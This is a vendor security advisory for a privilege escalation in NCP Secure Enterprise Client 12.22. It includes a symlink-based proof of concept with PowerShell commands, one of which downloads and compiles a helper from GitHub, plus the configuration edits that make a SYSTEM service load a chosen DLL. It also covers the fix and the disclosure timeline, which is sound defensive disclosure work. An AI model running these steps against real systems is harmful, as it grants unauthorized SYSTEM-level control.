usd-2022-0006 | NCP Secure Enterprise Client - Privilege Escalation

Advisory ID: usd-2022-0006
Product: NCP Secure Enterprise Client
Affected Version: 12.22
Vulnerability Type: Privilege Escalation
Security Risk: Critical
Vendor URL:: https//www.ncp-e.com/
Vendor Status: Fixed

Description

The NCP Secure Enterprise client is a VPN and networking application that is utilized by many organisations to connect workstations
to the cooperate network. The client supports a Support Assistant feature, which allows low privileged user accounts to obtain diagnostic
information from the operating system. The corresponding information is gathered by high privileged services and stored within the directory
C:\Users\\AppData\Local\Temp\NcpSupport*. Since this directory is fully user controlled, a low privileged user can create symbolic links
within it. This can be used to trick the
NCP Secure Enterprise client to change permissions on configuration files that are used by the client internally.
One of these configuration files contains the file system path of
dynamic linked library (DLL) files that are loaded during startup by the
application. Also high privileged services, that are installed together with the
NCP Secure Enterprise client, load the corresponding DLL* files,
resulting in a privilege escalation vulnerability.

Proof of Concept

To elevate permissions using the vulnerability, the following steps need to be performed:

  1. Start the Support Assistant and wait until all diagnostic information has been collected.
  2. Create a symbolic link that originates from C:\Users\\AppData\Local\Temp\NcpSupport\services.txt
    and points to the file C:\ProgramData\NCP\SecureClient\data\ncppki.conf.
  3. Abort the Support Assistant and restart it.
  4. Open C:\ProgramData\NCP\SecureClient\data\ncppki.conf and adjust the configuration settings
    DLLWIN95 and DLLWINNT to point to the DLL file you want to load.
  5. After rebooting the system, the specified DLL file is loaded with System privileges.

The reboot seems not even to be necessary and the DLL is also loaded automatically at a certain point of time.
In the following, each step is explained in more detail:

First we start the Support Assistant by using the tray icon of the NCP Secure Enterprise client. The Support Assistant
feature can be found in the upper right of the graphical user interface within the Help menu.

After the diagnostic information has been collected, we create a symbolic link pointing from C:\Users\\AppData\Local\Temp\NcpSupport\services.txt
to C:\ProgramData\NCP\SecureClient\data\ncppki.conf. Moreover, we verify that the file is not writable for low privileged user accounts:

PS C:\> icacls C:\ProgramData\NCP\SecureClient\data\ncppki.conf
C:\ProgramData\NCP\SecureClient\data\ncppki.conf NT-AUTORITÄT\SYSTEM:(I)(F) VORDEFINIERT\Administratoren:(I)(F) VORDEFINIERT\Benutzer:(I)(RX) 1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten. PS C:\> $code = (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content
PS C:\> Add-Type $code PS C:\> $s = New-Object de.usd.SharpLink.Symlink("C:\Users\labuser\AppData\Local\Temp\NcpSupport\Services.txt", "C:\ProgramData\NCP\SecureClient\data\ncppki.conf")
PS C:\> $s.Open()
[+] Creating Junction: C:\Users\labuser\AppData\Local\Temp\NcpSupport -> \RPC CONTROL
[+] Creating DosDevice: Global\GLOBALROOT\RPC CONTROL\Services.txt -> \??\C:\ProgramData\NCP\SecureClient\data\ncppki.conf
[+] Symlink setup successfully.

Now the Support Assistant is aborted and restarted. After this action has been performed, the file C:\ProgramData\NCP\SecureClient\data\ncppki.conf
is under full control of the invoking user account:

PS C:\> icacls C:\ProgramData\NCP\SecureClient\data\ncppki.conf
C:\ProgramData\NCP\SecureClient\data\ncppki.conf NT-AUTORITÄT\SYSTEM:(I)(F) VORDEFINIERT\Administratoren:(I)(F) LAB\labuser:(I)(F) VORDEFINIERT\Benutzer:(I)(RX) 1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten.

It is worth noting that the NCP Secure Enterprise client does not assign permissions to arbitrary files. Permissions for the current
invoking user seem to be granted, when the folder that contains the file is writable by the invoking user. For other files (e.g. C:\Windows\win.ini)
the NCP Secure Enterprise client deletes the corresponding file. This behavior is reported in a separate issue.

Now with write access to C:\ProgramData\NCP\SecureClient\data\ncppki.conf, one can modify the configuration items
WIN95DLL and WINNTDLL to point to an arbitrary location.

C:\>type C:\ProgramData\NCP\SecureClient\data\ncppki.conf

[General]
...SNIP... [CTAPI 3]
Visible = 1
ReaderName = SCM 1x0 (PIN Pad reader) (CT-API)
DLLWIN95 = C:\usd\scm11098.dll
DLLWINNT = C:\usd\scm110nt.dll

After rebooting the system, the specified DLL file is loaded by a service running as NT Authority\System:

Even if the NCP Secure Enterprise client would have deleted the file C:\ProgramData\NCP\SecureClient\data\ncppki.conf instead,
a privilege escalation would have been possible, since the folder *C:\ProgramData\NCP\SecureClient\data* is writable by low
privileged user accounts.

Fix

When changing privileges on resources within user controlled parts of the file system, applications need to be careful.
For such operations, symlinks should not be followed. When in doubt, the application should prefer to throw an error instead
of applying permissions to an incorrect target.

References

  • https://www.ncp-e.com/
  • https://github.com/usdAG/SharpLink

Timeline

  • 2022-02-02 First contact request via info-mv@ncp-e.com
  • 2022-02-02 Advisory transfered to the vendor
  • 2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
  • 2022-06-09 Responsible Disclosure Team requests an update
  • 2022-06-21 Vendor annouces a new software release available in August
  • 2022-08-31 NCP Secure Enterprise Client 13.10 is released
  • 2023-03-03 This advisory is published

 

Credits

These security vulnerabilities were found by Tobias Neitzel.